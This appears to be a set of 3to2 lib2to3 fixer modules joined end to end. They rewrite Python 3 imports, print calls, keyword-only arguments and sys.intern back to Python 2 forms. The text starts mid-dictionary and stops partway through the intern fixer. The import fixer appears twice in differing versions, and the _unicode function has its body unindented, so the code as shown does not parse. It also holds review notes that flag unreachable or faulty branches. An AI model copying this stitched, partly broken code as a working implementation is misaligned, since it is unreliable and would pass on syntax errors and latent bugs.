           "http.client": "httplib",
           "http.cookies": "Cookie",
           "http.cookiejar": "cookielib",
#          "tkinter": "Tkinter",
           "tkinter.dialog": "Dialog",
           "tkinter._fix": "FixTk",
           "tkinter.scrolledtext": "ScrolledText",
           "tkinter.tix": "Tix",
           "tkinter.constants": "Tkconstants",
           "tkinter.dnd": "Tkdnd",
           "tkinter.__init__": "Tkinter",
           "tkinter.colorchooser": "tkColorChooser",
           "tkinter.commondialog": "tkCommonDialog",
           "tkinter.font": "tkFont",
           "tkinter.messagebox": "tkMessageBox",
           "tkinter.turtle": "turtle",
           "urllib.robotparser": "robotparser",
           "xmlrpc.client": "xmlrpclib",
           "builtins": "__builtin__",
}
# generic strings to help build patterns
# these variables mean (with http.client.HTTPConnection as an example):
# name = http
# attr = client
# used = HTTPConnection
# fmt_name is a formatted subpattern (simple_name_match or dotted_name_match)
# helps match 'queue', as in 'from queue import ...'
simple_name_match = "name='{name}'"
# helps match 'client', to be used if client has been imported from http
subname_match = "attr='{attr}'"
# helps match 'http.client', as in 'import urllib.request'
dotted_name_match = "dotted_name=dotted_name< {fmt_name} '.' {fmt_attr} >"
# helps match 'queue', as in 'queue.Queue(...)'
power_onename_match = "{fmt_name}"
# helps match 'http.client', as in 'http.client.HTTPConnection(...)'
power_twoname_match = "power< {fmt_name} trailer< '.' {fmt_attr} > any* >"
# helps match 'client.HTTPConnection', if 'client' has been imported from http
power_subname_match = "power< {fmt_attr} any* >"
# helps match 'from http.client import HTTPConnection'
from_import_match = "from_import=import_from< 'from' {fmt_name} 'import' imported=any >"
# helps match 'from http import client'
from_import_submod_match = "from_import_submod=import_from< 'from' {fmt_name} 'import' ({fmt_attr} | import_as_name< {fmt_attr} 'as' renamed=any > | import_as_names< any* ({fmt_attr} | import_as_name< {fmt_attr} 'as' renamed=any >) any* > ) >"
# helps match 'import urllib.request'
name_import_match = "name_import=import_name< 'import' {fmt_name} > | name_import=import_name< 'import' dotted_as_name< {fmt_name} 'as' renamed=any > >"
# helps match 'import http.client, winreg'
multiple_name_import_match = "name_import=import_name< 'import' dotted_as_names< names=any* > >"
def all_patterns(name):
    """
    Accepts a string and returns a pattern of possible patterns involving that name
    Called by simple_mapping_to_pattern for each name in the mapping it receives.
    """
    # i_ patterns are import-like nodes; u_ patterns are usages of the name.
    if '.' in name:
        name, attr = name.split('.', 1)
        fmt_name = simple_name_match.format(name=name)
        fmt_attr = subname_match.format(attr=attr)
        fmt_dotted = dotted_name_match.format(fmt_name=fmt_name, fmt_attr=fmt_attr)
        alternatives = (
            name_import_match.format(fmt_name=fmt_dotted),
            from_import_match.format(fmt_name=fmt_dotted),
            from_import_submod_match.format(fmt_name=fmt_name, fmt_attr=fmt_attr),
            power_twoname_match.format(fmt_name=fmt_name, fmt_attr=fmt_attr),
            power_subname_match.format(fmt_attr=fmt_attr),
        )
    else:
        fmt_name = simple_name_match.format(name=name)
        alternatives = (
            name_import_match.format(fmt_name=fmt_name),
            from_import_match.format(fmt_name=fmt_name),
            power_onename_match.format(fmt_name=fmt_name),
        )
    return ' | \n'.join(alternatives)
class FixImports(fixer_base.BaseFix):
    """Rewrite one-to-one py3k -> py2k module renames (see MAPPING), in both
    import statements and dotted usages."""

    PATTERN = ' | \n'.join([all_patterns(name) for name in MAPPING])
    PATTERN = ' | \n'.join((PATTERN, multiple_name_import_match))

    def fix_dotted_name(self, node, mapping=MAPPING):
        """
        Accepts either a DottedName node or a power node with a trailer.
        If mapping is given, use it; otherwise use our MAPPING
        Returns a node that can be in-place replaced by the node given
        """
        if node.type == syms.dotted_name:
            _name = node.children[0]
            _attr = node.children[2]
        elif node.type == syms.power:
            _name = node.children[0]
            _attr = node.children[1].children[1]
        name = _name.value
        attr = _attr.value
        full_name = name + '.' + attr
        if not full_name in mapping:
            return
        to_repl = mapping[full_name]
        if '.' in to_repl:
            # Dotted replacement: swap both halves in place.
            repl_name, repl_attr = to_repl.split('.')
            _name.replace(Name(repl_name, prefix=_name.prefix))
            _attr.replace(Name(repl_attr, prefix=_attr.prefix))
        elif node.type == syms.dotted_name:
            node.replace(Name(to_repl, prefix=node.prefix))
        elif node.type == syms.power:
            # Simple replacement for a power node: rename the base and drop
            # the attribute trailer entirely.
            _name.replace(Name(to_repl, prefix=_name.prefix))
            parent = _attr.parent
            _attr.remove()
            parent.remove()

    def fix_simple_name(self, node, mapping=MAPPING):
        """
        Accepts a Name leaf.
        If mapping is given, use it; otherwise use our MAPPING
        Returns a node that can be in-place replaced by the node given
        """
        assert node.type == token.NAME, repr(node)
        if not node.value in mapping:
            return
        replacement = mapping[node.value]
        node.replace(Leaf(token.NAME, str(replacement), prefix=node.prefix))

    def fix_submod_import(self, imported, name, node):
        """
        Accepts a list of NAME leafs, a name string, and a node
        node is given as an argument to BaseFix.transform()
        NAME leafs come from an import_as_names node (the children)
        name string is the base name found in node.
        """
        submods = []
        missed = []
        for attr in imported:
            dotted = '.'.join((name, attr.value))
            if dotted in MAPPING:
                # get the replacement module
                to_repl = MAPPING[dotted]
                if '.' not in to_repl:
                    # it's a simple name, so use a simple replacement.
                    _import = NameImport(Name(to_repl, prefix=" "), attr.value)
                    submods.append(_import)
            elif attr.type == token.NAME:
                missed.append(attr.clone())
        if not submods:
            return
        parent = node.parent
        node.replace(submods[0])
        if len(submods) > 1:
            # NOTE(review): 'start'/'prev' are written but never read;
            # kept as-is to preserve behavior.
            start = submods.pop(0)
            prev = start
            for submod in submods:
                parent.append_child(submod)
        if missed:
            # Names we could not attribute to a known submodule are re-imported
            # verbatim, with a warning.
            self.warning(node, "Imported names not known to 3to2 to be part of the package {0}. Leaving those alone... high probability that this code will be incorrect.".format(name))
            children = [Name("from"), Name(name, prefix=" "), Name("import", prefix=" "), Node(syms.import_as_names, missed)]
            orig_stripped = Node(syms.import_from, children)
            parent.append_child(Newline())
            parent.append_child(orig_stripped)

    def get_dotted_import_replacement(self, name_node, attr_node, mapping=MAPPING, renamed=None):
        """
        For (http, client) given and httplib being the correct replacement,
        returns (httplib as client, None)
        For (test, support) given and test.test_support being the replacement,
        returns (test, test_support as support)
        """
        full_name = name_node.value + '.' + attr_node.value
        replacement = mapping[full_name]
        if '.' in replacement:
            new_name, new_attr = replacement.split('.')
            if renamed is None:
                return Name(new_name, prefix=name_node.prefix), Node(syms.dotted_as_name, [Name(new_attr, prefix=attr_node.prefix), Name('as', prefix=" "), attr_node.clone()])
            else:
                return Name(new_name, prefix=name_node.prefix), Name(new_attr, prefix=attr_node.prefix)
        else:
            return Node(syms.dotted_as_name, [Name(replacement, prefix=name_node.prefix), Name('as', prefix=' '), Name(attr_node.value, prefix=attr_node.prefix)]), None

    def transform(self, node, results):
        # Dispatch on which named sub-pattern of PATTERN matched.
        from_import = results.get("from_import")
        from_import_submod = results.get("from_import_submod")
        name_import = results.get("name_import")
        dotted_name = results.get("dotted_name")
        name = results.get("name")
        names = results.get("names")
        attr = results.get("attr")
        imported = results.get("imported")
        if names:
            # import a, b.c, d -> fix each listed name individually.
            for name in names:
                if name.type == token.NAME:
                    self.fix_simple_name(name)
                elif name.type == syms.dotted_as_name:
                    self.fix_simple_name(name.children[0]) if name.children[0].type == token.NAME else \
                    self.fix_dotted_name(name.children[0])
                elif name.type == syms.dotted_name:
                    self.fix_dotted_name(name)
        elif from_import_submod:
            # from http import client [as c]
            renamed = results.get("renamed")
            new_name, new_attr = self.get_dotted_import_replacement(name, attr, renamed=renamed)
            if new_attr is not None:
                name.replace(new_name)
                attr.replace(new_attr)
            else:
                children = [Name("import"), new_name]
                node.replace(Node(syms.import_name, children, prefix=node.prefix))
        elif dotted_name:
            self.fix_dotted_name(dotted_name)
        elif name_import or from_import:
            self.fix_simple_name(name)
        elif name and not attr:
            # Bare usage of a mapped name; only rename it if the mapped py2k
            # module is actually imported in this tree.
            if does_tree_import(None, MAPPING[name.value], node):
                self.fix_simple_name(name)
        elif name and attr:
            # Note that this will fix a dotted name that was never imported. This will probably not matter.
            self.fix_dotted_name(node)
        elif imported and imported.type == syms.import_as_names:
            self.fix_submod_import(imported=imported.children, node=node, name=name.value)
from __future__ import with_statement # Aiming for 2.5-compatible code
from lib2to3 import fixer_base
from lib2to3.pytree import Node, Leaf
from lib2to3.pygram import python_symbols as syms, token
from lib2to3.fixer_util import (Name, FromImport, Newline, Call, Comma, Dot,
LParen, RParen, touch_import)
import warnings
import sys
def gen_printargs(lst):
    """
    Accepts a list of all nodes in the print call's trailer.
    Yields nodes that will be easier to deal with: arglist wrappers are
    flattened into their individual argument nodes.
    """
    for node in lst:
        if node.type != syms.arglist:
            yield node
            continue
        # Inside an arglist the children alternate argument, comma,
        # argument, comma, ...  Every other child is a real argument
        # (either positional or a "file"/"sep"/"end" keyword argument),
        # so yield the even-indexed children and skip the commas.
        for real_arg in node.children[::2]:
            yield real_arg
def isNone(arg):
    """
    Returns True if arg is a None node
    """
    if arg.type != token.NAME:
        return False
    return arg.value == "None"
def _unicode(arg):
"""
Calls unicode() on the arg in the node.
"""
prefix = arg.prefix
arg = arg.clone()
arg.prefix = ""
ret = Call(Name("unicode", prefix=prefix), [arg])
return ret
def add_file_part(file, lst):
    """
    Append ``>> file ,`` to lst, unless file is absent or the None node
    (in which case the default stream is used and nothing is added).
    """
    if file is not None and not isNone(file):
        lst.extend([Leaf(token.RIGHTSHIFT, ">>", prefix=" "),
                    file.clone(),
                    Comma()])
def add_sep_part(sep, pos, lst):
    """
    Append the positional print arguments to lst.

    If sep is a real separator (present, not the None node, and not a
    plain single space), the arguments are rendered as
    ``sep.join([unicode(a), ...])``; otherwise they are appended
    verbatim, comma-separated, as an ordinary print statement expects.
    """
    if sep is not None and not isNone(sep) and \
       not (sep.type == token.STRING and sep.value in ("' '", '" "')):
        temp = []
        for arg in pos:
            temp.append(_unicode(arg.clone()))
            if sys.version_info >= (2, 6):
                # unicode() may misbehave on bytes objects; the caller
                # collects this warning and surfaces it to the user.
                warnings.warn("Calling unicode() on what may be a bytes object")
            temp.append(Comma())
        # Drop the trailing comma.
        # NOTE(review): if pos is empty (e.g. print(sep='-') alone), temp is
        # empty and this del raises IndexError -- confirm that callers never
        # reach here without positional args.
        del temp[-1]
        sep = sep.clone()
        sep.prefix = " "
        args = Node(syms.listmaker, temp)
        new_list = Node(syms.atom, [Leaf(token.LSQB, "["), args,
                                    Leaf(token.RSQB, "]")])
        join_arg = Node(syms.trailer, [LParen(), new_list, RParen()])
        sep_join = Node(syms.power, [sep, Node(syms.trailer,
                                               [Dot(), Name("join")])])
        lst.append(sep_join)
        lst.append(join_arg)
    else:
        if pos:
            pos[0].prefix = " "
        for arg in pos:
            lst.append(arg.clone())
            lst.append(Comma())
        # Drop the trailing comma.
        # NOTE(review): with empty pos this removes lst's previous last
        # element instead -- presumably unreachable; verify against callers.
        del lst[-1]
def add_end_part(end, file, parent, loc):
    """
    Emit ``; file.write(end)`` right after the print statement found at
    parent's child index loc, to emulate py3k's end= keyword.

    Nothing is emitted when end is the None node or a literal single
    space (the trailing-comma form of print already produces a space).
    """
    if isNone(end):
        return
    single_space = ("' '", '" "', "u' '", 'u" "', "b' '", 'b" "')
    if end.type == token.STRING and end.value in single_space:
        return
    if file is None:
        # Default stream: sys.stdout.  Make sure sys is imported.
        touch_import(None, "sys", parent)
        file = Node(syms.power,
                    [Name("sys"), Node(syms.trailer, [Dot(), Name("stdout")])])
    writer = Node(syms.power,
                  [file,
                   Node(syms.trailer, [Dot(), Name("write")]),
                   Node(syms.trailer, [LParen(), end, RParen()])])
    writer.prefix = " "
    parent.insert_child(loc, Leaf(token.SEMI, ";"))
    parent.insert_child(loc + 1, writer)
def replace_print(pos, opts, old_node=None):
    """
    Replace old_node with a new print statement built from the positional
    args pos and the keyword options opts.  Also hacks in the "end"
    functionality via a trailing ``; file.write(end)``.
    """
    new_node = new_print(*pos, **opts)
    end = opts["end"].clone() if "end" in opts else None
    file_node = opts["file"].clone() if "file" in opts else None
    if old_node is None:
        # Nothing to replace: fabricate a bare simple_stmt to host the print.
        parent = Node(syms.simple_stmt, [Leaf(token.NEWLINE, "\n")])
        index = 0
    else:
        parent = old_node.parent
        index = old_node.remove()  # remove() hands back the old child index
    parent.insert_child(index, new_node)
    ends_with_newline = (end is not None and end.type == token.STRING and
                         end.value in ("'\\n'", '"\\n"'))
    if end is not None and not ends_with_newline:
        add_end_part(end, file_node, parent, index + 1)
    return new_node
def new_print(*pos, **opts):
    """
    Constructs a new print_stmt node.

    pos is all positional arguments passed to print().
    opts contains zero or more of the following mappings:
        'sep': some string
        'file': some file-like object that supports the write() method
        'end': some string
    """
    children = [Name("print")]
    sep = opts.get("sep")
    file = opts.get("file")
    end = opts.get("end")
    add_file_part(file, children)
    add_sep_part(sep, pos, children)
    if end is not None and not isNone(end):
        # A trailing comma suppresses the newline, emulating any non-"\n" end.
        if end.value not in ('"\\n"', "'\\n'"):
            children.append(Comma())
    return Node(syms.print_stmt, children)
def map_printargs(args):
    """
    Accepts a list of all nodes in the print call's trailer.
    Returns (pos, mapping) where pos is the list of positional argument
    nodes and mapping holds the 'sep'/'end'/'file' keyword nodes.
    Returns (None, None) when argument unpacking (*args) is present.
    """
    mapping = {}
    pos = []
    for arg in gen_printargs(args):
        if arg.type == syms.argument:
            kids = arg.children
            assert kids[0].type == token.NAME, repr(arg)
            assert len(kids) > 1, repr(arg)
            key = str(kids[0].value)
            assert key in ("sep", "end", "file")
            assert key not in mapping, mapping
            mapping[key] = kids[2]
        elif arg.type == token.STAR:
            # print(*args) cannot be mapped statically.
            return (None, None)
        else:
            pos.append(arg)
    return (pos, mapping)
class FixPrint(fixer_base.BaseFix):
    """Rewrites py3k print(...) calls into py2k print statements."""

    PATTERN = """
              power< 'print' parens=trailer < '(' args=any* ')' > any* >
              """

    def match(self, node):
        """
        Since the tree needs to be fixed once and only once if and only if it
        matches, then we can start discarding matches after we make the first.
        """
        # NOTE(review): despite the docstring, no matches are actually
        # discarded here; this just defers to the base class.
        return super(FixPrint,self).match(node)

    def transform(self, node, results):
        args = results.get("args")
        if not args:
            # Bare print(): the statement form is just "print"; drop parens.
            parens = results.get("parens")
            parens.remove()
            return
        pos, opts = map_printargs(args)
        if pos is None or opts is None:
            # map_printargs signals *args unpacking with (None, None).
            self.cannot_convert(node, "-fprint does not support argument unpacking.  fix using -xprint and then again with -fprintfunction.")
            return
        if "file" in opts and \
           "end" in opts and \
           opts["file"].type != token.NAME:
            # "print >> expr, ...; expr.write(end)" would evaluate expr twice.
            self.warning(opts["file"], "file is not a variable name; "\
                "print fixer suggests to bind the file to a variable "\
                "name first before passing it to print function")
        try:
            with warnings.catch_warnings(record=True) as w:
                new_node = replace_print(pos, opts, old_node=node)
                if len(w) > 0:
                    self.warning(node, "coercing to unicode even though this may be a bytes object")
        except AttributeError:
            # Python 2.5 doesn't have warnings.catch_warnings, so we're in Python 2.5 code here...
            # NOTE(review): bytes(k) on a str raises TypeError on Python 3,
            # but this branch is unreachable there since catch_warnings
            # exists -- confirm before relying on the fallback.
            new_node = replace_print(pos, dict([(bytes(k), opts[k]) for k in opts]), old_node=node)
        new_node.prefix = node.prefix
from lib2to3 import fixer_base
from ..fixer_util import token, indentation, suitify, String, Newline, Comma, DoubleStar, Name
# Statement templates spliced into the rewritten function body: each
# keyword-only name is popped out of the kwargs dict, with an if/else
# pair when the parameter carries a default value.
_assign_template = "%(name)s = %(kwargs)s['%(name)s']; del %(kwargs)s['%(name)s']"
_if_template = "if '%(name)s' in %(kwargs)s: %(assign)s"
_else_template = "else: %(name)s = %(default)s"
# Synthetic dict name used when the function has no **kwargs of its own.
_kwargs_default_name = "_3to2kwargs"
def gen_params(raw_params):
    """
    Generator that yields tuples of (name, default_value) for each
    keyword-only parameter in the list.
    If no default is given, default_value is None (the Python object,
    not Leaf(token.NAME, 'None')).
    """
    assert raw_params[0].type == token.STAR and len(raw_params) > 2
    idx = 2                      # keyword-only names cannot appear before index 2
    limit = len(raw_params)
    while idx < limit:
        candidate = raw_params[idx]
        if candidate.type != token.NAME:
            idx += 1
            continue
        before = candidate.prev_sibling
        if before is not None and before.type == token.DOUBLESTAR:
            # A NAME right after ** is the kwargs catch-all, not keyword-only.
            break
        after = candidate.next_sibling
        if after is not None and after.type == token.EQUAL:
            yield (candidate.value, after.next_sibling)
            idx += 3             # skip NAME, '=', and the default expression
        else:
            yield (candidate.value, None)
            idx += 1
def remove_params(raw_params, kwargs_default=_kwargs_default_name):
    """
    Removes all keyword-only args from the params list and a bare star,
    if any.  Does not add the kwargs dict if needed.
    Returns True if more action is needed (no kwargs dict exists yet),
    False otherwise.
    """
    assert raw_params[0].type == token.STAR
    if raw_params[1].type == token.COMMA:
        # Bare star: "*," -- remove both the star and its comma.
        raw_params[0].remove()
        raw_params[1].remove()
        keyword_only = raw_params[2:]
    else:
        # "*args," -- keep the starred parameter itself.
        keyword_only = raw_params[3:]
    for param in keyword_only:
        if param.type == token.DOUBLESTAR:
            # An existing **kwargs: stop here, nothing more to add.
            return False
        param.remove()
    return True
def needs_fixing(raw_params, kwargs_default=_kwargs_default_name):
    """
    Returns string with the name of the kwargs dict if the params after the first star need fixing
    Otherwise returns empty string
    """
    found_kwargs = False
    needs_fix = False
    for t in raw_params[2:]:
        if t.type == token.COMMA:
            # Commas are irrelevant at this stage.
            continue
        elif t.type == token.NAME and not found_kwargs:
            # Keyword-only argument: definitely need to fix.
            needs_fix = True
        elif t.type == token.NAME and found_kwargs:
            # Return 'foobar' of **foobar, if needed.
            return t.value if needs_fix else ''
        elif t.type == token.DOUBLESTAR:
            # Found either '*' from **foobar.
            found_kwargs = True
        else:
            # Never found **foobar.  Return a synthetic name, if needed.
            return kwargs_default if needs_fix else ''
    # NOTE(review): execution can fall off the end here (e.g. the params end
    # with a keyword-only NAME and no **kwargs), implicitly returning None.
    # Callers only test truthiness, so such signatures are silently left
    # unfixed -- confirm whether that is intended.
class FixKwargs(fixer_base.BaseFix):
    """
    Rewrites py3k keyword-only arguments into py2k-compatible code: the
    keyword-only names are stripped from the signature and re-extracted
    from a **kwargs dict at the top of the function body.
    """

    run_order = 7 # Run after function annotations are removed

    PATTERN = "funcdef< 'def' NAME parameters< '(' arglist=typedargslist< params=any* > ')' > ':' suite=any >"

    def transform(self, node, results):
        params_rawlist = results["params"]
        # Slice the parameter list so it starts at the bare/varargs star.
        for i, item in enumerate(params_rawlist):
            if item.type == token.STAR:
                params_rawlist = params_rawlist[i:]
                break
        else:
            return
        # params is guaranteed to be a list starting with *.
        # if fixing is needed, there will be at least 3 items in this list:
        # [STAR, COMMA, NAME] is the minimum that we need to worry about.
        new_kwargs = needs_fixing(params_rawlist)
        # new_kwargs is the name of the kwargs dictionary.
        if not new_kwargs:
            return
        suitify(node)
        # At this point, params_rawlist is guaranteed to be a list
        # beginning with a star that includes at least one keyword-only param
        # e.g., [STAR, NAME, COMMA, NAME, COMMA, DOUBLESTAR, NAME] or
        # [STAR, COMMA, NAME], or [STAR, COMMA, NAME, COMMA, DOUBLESTAR, NAME]
        # Anatomy of a funcdef: ['def', 'name', parameters, ':', suite]
        # Anatomy of that suite: [NEWLINE, INDENT, first_stmt, all_other_stmts]
        # We need to insert our new stuff before the first_stmt and change the
        # first_stmt's prefix.
        suite = node.children[4]
        first_stmt = suite.children[2]
        ident = indentation(first_stmt)
        # Inserting at index 2 each time means the statements end up in
        # reverse order of insertion, i.e. source order per parameter.
        for name, default_value in gen_params(params_rawlist):
            if default_value is None:
                suite.insert_child(2, Newline())
                suite.insert_child(2, String(_assign_template %{'name':name, 'kwargs':new_kwargs}, prefix=ident))
            else:
                suite.insert_child(2, Newline())
                suite.insert_child(2, String(_else_template %{'name':name, 'default':default_value}, prefix=ident))
                suite.insert_child(2, Newline())
                suite.insert_child(2, String(_if_template %{'assign':_assign_template %{'name':name, 'kwargs':new_kwargs}, 'name':name, 'kwargs':new_kwargs}, prefix=ident))
        first_stmt.prefix = ident
        suite.children[2].prefix = ""
        # Now, we need to fix up the list of params.
        must_add_kwargs = remove_params(params_rawlist)
        if must_add_kwargs:
            arglist = results['arglist']
            if len(arglist.children) > 0 and arglist.children[-1].type != token.COMMA:
                arglist.append_child(Comma())
            arglist.append_child(DoubleStar(prefix=" "))
            arglist.append_child(Name(new_kwargs))
from lib2to3 import fixer_base
from lib2to3.fixer_util import Name, is_probably_builtin, Newline, does_tree_import
from lib2to3.pygram import python_symbols as syms
from lib2to3.pgen2 import token
from lib2to3.pytree import Node, Leaf
from ..fixer_util import NameImport
# used in simple_mapping_to_pattern()
# Maps a py3k module (or module.attr) name to its one-to-one py2k replacement.
MAPPING = {"reprlib": "repr",
           "winreg": "_winreg",
           "configparser": "ConfigParser",
           "copyreg": "copy_reg",
           "queue": "Queue",
           "socketserver": "SocketServer",
           "_markupbase": "markupbase",
           "test.support": "test.test_support",
           "dbm.bsd": "dbhash",
           "dbm.ndbm": "dbm",
           "dbm.dumb": "dumbdbm",
           "dbm.gnu": "gdbm",
           "html.parser": "HTMLParser",
           "html.entities": "htmlentitydefs",
           "http.client": "httplib",
           "http.cookies": "Cookie",
           "http.cookiejar": "cookielib",
           # "tkinter": "Tkinter",
           "tkinter.dialog": "Dialog",
           "tkinter._fix": "FixTk",
           "tkinter.scrolledtext": "ScrolledText",
           "tkinter.tix": "Tix",
           "tkinter.constants": "Tkconstants",
           "tkinter.dnd": "Tkdnd",
           "tkinter.__init__": "Tkinter",
           "tkinter.colorchooser": "tkColorChooser",
           "tkinter.commondialog": "tkCommonDialog",
           "tkinter.font": "tkFont",
           "tkinter.messagebox": "tkMessageBox",
           "tkinter.turtle": "turtle",
           "urllib.robotparser": "robotparser",
           "xmlrpc.client": "xmlrpclib",
           "builtins": "__builtin__",
}

# generic strings to help build patterns
# these variables mean (with http.client.HTTPConnection as an example):
# name = http
# attr = client
# used = HTTPConnection
# fmt_name is a formatted subpattern (simple_name_match or dotted_name_match)

# helps match 'queue', as in 'from queue import ...'
simple_name_match = "name='%s'"
# helps match 'client', to be used if client has been imported from http
subname_match = "attr='%s'"
# helps match 'http.client', as in 'import urllib.request'
dotted_name_match = "dotted_name=dotted_name< %s '.' %s >"
# helps match 'queue', as in 'queue.Queue(...)'
power_onename_match = "%s"
# helps match 'http.client', as in 'http.client.HTTPConnection(...)'
power_twoname_match = "power< %s trailer< '.' %s > any* >"
# helps match 'client.HTTPConnection', if 'client' has been imported from http
power_subname_match = "power< %s any* >"
# helps match 'from http.client import HTTPConnection'
from_import_match = "from_import=import_from< 'from' %s 'import' imported=any >"
# helps match 'from http import client'
from_import_submod_match = "from_import_submod=import_from< 'from' %s 'import' (%s | import_as_name< %s 'as' renamed=any > | import_as_names< any* (%s | import_as_name< %s 'as' renamed=any >) any* > ) >"
# helps match 'import urllib.request'
name_import_match = "name_import=import_name< 'import' %s > | name_import=import_name< 'import' dotted_as_name< %s 'as' renamed=any > >"
# helps match 'import http.client, winreg'
multiple_name_import_match = "name_import=import_name< 'import' dotted_as_names< names=any* > >"
def all_patterns(name):
    """
    Accepts a string and returns a pattern of possible patterns involving
    that name.  Called by simple_mapping_to_pattern for each name in the
    mapping it receives.
    """
    # i_ subpatterns describe import-like nodes; u_ subpatterns describe
    # apparent usages of the name.
    if '.' not in name:
        fmt_name = simple_name_match % (name)
        alternatives = (name_import_match % (fmt_name, fmt_name),
                        from_import_match % (fmt_name),
                        power_onename_match % (fmt_name))
        return ' | \n'.join(alternatives)
    mod, attr = name.split('.', 1)
    fmt_name = simple_name_match % (mod)
    fmt_attr = subname_match % (attr)
    fmt_dotted = dotted_name_match % (fmt_name, fmt_attr)
    alternatives = (name_import_match % (fmt_dotted, fmt_dotted),
                    from_import_match % (fmt_dotted),
                    from_import_submod_match % (fmt_name, fmt_attr, fmt_attr, fmt_attr, fmt_attr),
                    power_twoname_match % (fmt_name, fmt_attr),
                    power_subname_match % (fmt_attr))
    return ' | \n'.join(alternatives)
class FixImports(fixer_base.BaseFix):
    """
    Renames py3k standard-library modules (and attribute references to
    them) back to their py2k names, for modules with a one-to-one mapping.
    """

    PATTERN = ' | \n'.join([all_patterns(name) for name in MAPPING])
    PATTERN = ' | \n'.join((PATTERN, multiple_name_import_match))

    def fix_dotted_name(self, node, mapping=MAPPING):
        """
        Accepts either a DottedName node or a power node with a trailer.
        If mapping is given, use it; otherwise use our MAPPING
        Returns a node that can be in-place replaced by the node given
        """
        if node.type == syms.dotted_name:
            _name = node.children[0]
            _attr = node.children[2]
        elif node.type == syms.power:
            _name = node.children[0]
            _attr = node.children[1].children[1]
        name = _name.value
        attr = _attr.value
        full_name = name + '.' + attr
        if not full_name in mapping:
            return
        to_repl = mapping[full_name]
        if '.' in to_repl:
            # Replacement is itself dotted: swap both halves in place.
            repl_name, repl_attr = to_repl.split('.')
            _name.replace(Name(repl_name, prefix=_name.prefix))
            _attr.replace(Name(repl_attr, prefix=_attr.prefix))
        elif node.type == syms.dotted_name:
            node.replace(Name(to_repl, prefix=node.prefix))
        elif node.type == syms.power:
            # Collapse the "name.attr" usage down to the single new name.
            _name.replace(Name(to_repl, prefix=_name.prefix))
            parent = _attr.parent
            _attr.remove()
            parent.remove()

    def fix_simple_name(self, node, mapping=MAPPING):
        """
        Accepts a Name leaf.
        If mapping is given, use it; otherwise use our MAPPING
        Returns a node that can be in-place replaced by the node given
        """
        assert node.type == token.NAME, repr(node)
        if not node.value in mapping:
            return
        replacement = mapping[node.value]
        node.replace(Leaf(token.NAME, str(replacement), prefix=node.prefix))

    def fix_submod_import(self, imported, name, node):
        """
        Accepts a list of NAME leafs, a name string, and a node
        node is given as an argument to BaseFix.transform()
        NAME leafs come from an import_as_names node (the children)
        name string is the base name found in node.
        """
        submods = []
        missed = []
        for attr in imported:
            dotted = '.'.join((name, attr.value))
            if dotted in MAPPING:
                # get the replacement module
                to_repl = MAPPING[dotted]
                if '.' not in to_repl:
                    # it's a simple name, so use a simple replacement.
                    _import = NameImport(Name(to_repl, prefix=" "), attr.value)
                    submods.append(_import)
            elif attr.type == token.NAME:
                missed.append(attr.clone())
        if not submods:
            return
        parent = node.parent
        node.replace(submods[0])
        if len(submods) > 1:
            start = submods.pop(0)
            prev = start
            for submod in submods:
                parent.append_child(submod)
        if missed:
            self.warning(node, "Imported names not known to 3to2 to be part of the package %s. Leaving those alone... high probability that this code will be incorrect." % (name))
            # Re-emit the unknown names as a plain "from name import ..." line.
            children = [Name("from"), Name(name, prefix=" "), Name("import", prefix=" "), Node(syms.import_as_names, missed)]
            orig_stripped = Node(syms.import_from, children)
            parent.append_child(Newline())
            parent.append_child(orig_stripped)

    def get_dotted_import_replacement(self, name_node, attr_node, mapping=MAPPING, renamed=None):
        """
        For (http, client) given and httplib being the correct replacement,
        returns (httplib as client, None)
        For (test, support) given and test.test_support being the replacement,
        returns (test, test_support as support)
        """
        full_name = name_node.value + '.' + attr_node.value
        replacement = mapping[full_name]
        if '.' in replacement:
            new_name, new_attr = replacement.split('.')
            if renamed is None:
                return Name(new_name, prefix=name_node.prefix), Node(syms.dotted_as_name, [Name(new_attr, prefix=attr_node.prefix), Name('as', prefix=" "), attr_node.clone()])
            else:
                return Name(new_name, prefix=name_node.prefix), Name(new_attr, prefix=attr_node.prefix)
        else:
            return Node(syms.dotted_as_name, [Name(replacement, prefix=name_node.prefix), Name('as', prefix=' '), Name(attr_node.value, prefix=attr_node.prefix)]), None

    def transform(self, node, results):
        # Exactly one of these pattern groups matched; dispatch on which.
        from_import = results.get("from_import")
        from_import_submod = results.get("from_import_submod")
        name_import = results.get("name_import")
        dotted_name = results.get("dotted_name")
        name = results.get("name")
        names = results.get("names")
        attr = results.get("attr")
        imported = results.get("imported")
        if names:
            # import a, b.c, d as e, ... -- fix each imported name in turn.
            for name in names:
                if name.type == token.NAME:
                    self.fix_simple_name(name)
                elif name.type == syms.dotted_as_name:
                    self.fix_simple_name(name.children[0]) if name.children[0].type == token.NAME else \
                    self.fix_dotted_name(name.children[0])
                elif name.type == syms.dotted_name:
                    self.fix_dotted_name(name)
        elif from_import_submod:
            renamed = results.get("renamed")
            new_name, new_attr = self.get_dotted_import_replacement(name, attr, renamed=renamed)
            if new_attr is not None:
                name.replace(new_name)
                attr.replace(new_attr)
            else:
                children = [Name("import"), new_name]
                node.replace(Node(syms.import_name, children, prefix=node.prefix))
        elif dotted_name:
            self.fix_dotted_name(dotted_name)
        elif name_import or from_import:
            self.fix_simple_name(name)
        elif name and not attr:
            if does_tree_import(None, MAPPING[name.value], node):
                self.fix_simple_name(name)
        elif name and attr:
            # Note that this will fix a dotted name that was never imported.  This will probably not matter.
            self.fix_dotted_name(node)
        elif imported and imported.type == syms.import_as_names:
            self.fix_submod_import(imported=imported.children, node=node, name=name.value)
from lib2to3 import pytree
from lib2to3 import fixer_base
from lib2to3.fixer_util import Name, BlankLine, find_binding, find_root
class FixIntern(fixer_base.BaseFix):
    """
    Rewrites py3k sys.intern(...) calls back to the py2k builtin
    intern(...), and strips "intern" from "from sys import ..." lines.
    """

    PATTERN = """
    power< 'sys' trailer < '.' 'intern' >
        trailer< lpar='('
            ( not(arglist | argument<any '=' any>) obj=any
              | obj=arglist<(not argument<any '=' any>) any ','> )
            rpar=')' >
        after=any* >
    |
    import_from< 'from' 'sys' 'import'
        import_as_names< pre=any* binding='intern' post=any* > any* >
    |
    import_from< 'from' 'sys' 'import' simple='intern' >
    """

    def transform(self, node, results):
        name = results.get("name")
        binding = results.get("binding")
        pre = results.get("pre")
        post = results.get("post")
        simple = results.get("simple")
        if simple:
            # "from sys import intern" alone: remove the entire binding.
            binding = find_binding("intern", find_root(node), "sys")
            binding.remove()
            return
        if binding:
            if not pre and not post:
                # "intern" is the only name in the import_as_names list.
                new_binding = find_binding("intern", find_root(node), "sys")
                new_binding.remove()
                return
